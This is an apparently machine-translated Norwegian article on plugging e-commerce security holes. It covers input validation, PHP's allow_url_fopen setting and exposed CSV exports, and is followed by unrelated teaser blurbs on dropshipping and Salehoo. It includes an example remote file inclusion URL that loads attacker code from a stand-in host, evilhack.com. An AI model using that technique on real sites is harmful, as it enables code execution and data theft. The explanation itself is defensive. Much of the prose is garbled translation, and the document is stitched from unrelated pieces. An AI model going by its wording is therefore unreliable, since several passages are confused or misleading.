Sikkerhet i en e-handel må være en viktig faktor når du utvikler en e-handel nettside eller programvare. En utbygger må være klar over alle sikkerhetsoppdateringene hensyn når designe et nettsted. Med e-handel blir mer vanlig i disse dager, er antall sikkerhetsangrep sikkert økende. Paranoia er en sunn ting for e-handel utviklere, vi må holde deg gate med sikkerhetsspørsmål, og holder våre ører og øyne åpne. Selv følgende smutthull er alvorlige, er følgende smutthull hvis det finnes lett fast.
Listet nedenfor er noen garanti hensyn skal tas når du utvikler et nettsted. Denne artikkelen dekker ikke e-butikktyveri, vennligst se min egen artikkel om dette.
Brukerundersøkelser - hver inngang, enten det er inn i en mengde, som søker etter et produkt, taste inn et navn osv., må være godkjent for mistenkelige tegn. Hvis dette ikke gjøres, er det mulig å gå inn "?>", den avsluttende sluttkoder av PHP og utføre noe PHP kode.
Det er langt tryggere tillate tall og tegn az (hovedsteder inkludert) og 0-9 og ingenting annet, i stedet lage en liste over alle tegn som ikke skal være der. Den godkjenningen skriptet må bla gjennom hvert tegn én etter én. Dette må oppnås med i serversiden godkjenningen, ikke Javascript. Bruke server side validering av inndata er viktig å holde ut uønskede tegn
Det eksisterer et stort ved utføring PHP kode. Ved bruk av PHP er det en innstilling kalt allow_url_fopen som muliggjør åpning av filer fra en PHP-script. Denne innstillingen skal være slått av, med mindre det er tvingende nødvendig.
Tenk du har PHP-skript for både fast topp-og bunntekst, og tilgang til nettsidene du ville skrive i http://www.mysite.com/index.php?page=page2. Alt som trengs er en ondsinnet bruker å kjøre et skript ved å endre disse parameterne ved å skrive "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" med noe PHP kode i filen "hacker.txt". Du kunne ha noe skje, filer PHP lese, slettet vital informasjon stjålet.
Hvis du ikke er sikker på om denne innstillingen er på eller av, kan du kopiere følgende PHP-koden i en tekstfil, og laste den opp til webserveren din:
phpinfo ();
?>
Når du tilgang til skript på webserveren din, bør du komme over innstillingen allow_url_fopen under konfigurasjonen.
En datamaskin bruker, kan under normale omstendigheter ikke finne verdien av denne innstillingen.
Vær forsiktig med eksporterte data som ordrer, produkter i CSV og mySQL filer. Hvis disse dataene er eksportert fra et manus og holdes på webserveren under felles filnavn f.eks. http://www.mysite.com/admin/output_tables.csv. Dette er bare virkelig et problem når de eksporterte dataene ligger i en fil i en katalog som er offentlig tilgjengelig. Det er to måter å forhindre denne sikkerhetsoppdateringen smutthull - Først har utdatafilen bak en passordbeskyttet katalog, det andre har de dataene som ligger inne i en HTML-textarea skjema element på et skript. Den storeowner Deretter kan du kopiere denne informasjonen fra tekstfil og opprette en ny fil på datamaskinen og lime inn informasjon her.
Alt som trengs er en hacker å finne dette filnavnet ved å sjekke e-commerce software's demo nettside og se etter de samme filnavn på en ekte nettsted.
Listet nedenfor er flere artikler relatert til de ovennevnte artikkel fra "E-handel" artikkel kategorien.
Folk interessert i den ovennevnte artikkelen "E-handel Sikkerhet - Plugging Sikkerhet Holes" er også interessert i de relaterte artiklene nedenfor:
Kjøre en e-handel business handler ikke bare om å holde nettsiden oppe og går. Kunder som stoler på din evne til å tjene dem via telefon, faks, e-post, eller på andre måter, og det krever at alle systemer skal jobbe for å kunne oppfylle kundenes forespørsler.
Bare et par dager tilbake ble jeg ha en samtale med min venn. Han feiret sin baby's 1st bursdag og måtte løpe mellom hjemlandet i Kerala og Chennai, hans arbeidsplass. Han og hans bedre halvdel reiste mellom disse stedene minst 4 ganger i siste måned.
Hvis du har gjort e-handel for enhver tid, ville du visst at det er flere scamers enn ekte leverandører av engros Dropship katalogtjenester. I en verden av e-business, Salehoo og Global Brands er begge anerkjente tjenesteleverandører som har vunnet popularitet i de siste årene.
Hvis du noensinne har vært en forhandler, har du sannsynligvis allerede hørt om Salehoo eller selv brukt det til din fordel. Hvis du bare starte opp med bedriften din, kan du bli forvekslet med den blandede Salehoo vurderinger der ute. Nå, la oss ta en titt på hva Salehoo egentlig handler om, og tjenestene de tilbyr som mange har en tendens til å overse.
Hvor mange kjenner du som har kjøpt noe på nettet? Hvis du som meg en hel del, det er derfor e-handel er verdens nye online kjøpesenter. Men hvem driver disse online butikker? Mennesker akkurat som deg og meg, det er derfor denne virksomheten er blomstrende og vil fortsette å boom nå og langt inn i fremtiden.
Hvis du er en stor fan av de nyeste elektroniske produkter, kan du bli fristet av tanken på å kjøre din egen elektronikk bedrift online. Det er ikke så vanskelig å komme i gang når du tar den full nytte av retten slippe frakt elektronikk service og det er nok for deg å velge mellom.
Har du noen gang gå inn i din lokale nærbutikk og lurer på hva det ville være som om du eide den? Vil du bli en god eier, vil folk som deg? Vel denne artikkelen vil vise deg fordelene ved å eie din egen online butikk, eller allment kjent som e-handel som er forskjellig fra en ekte lokal kiosk.
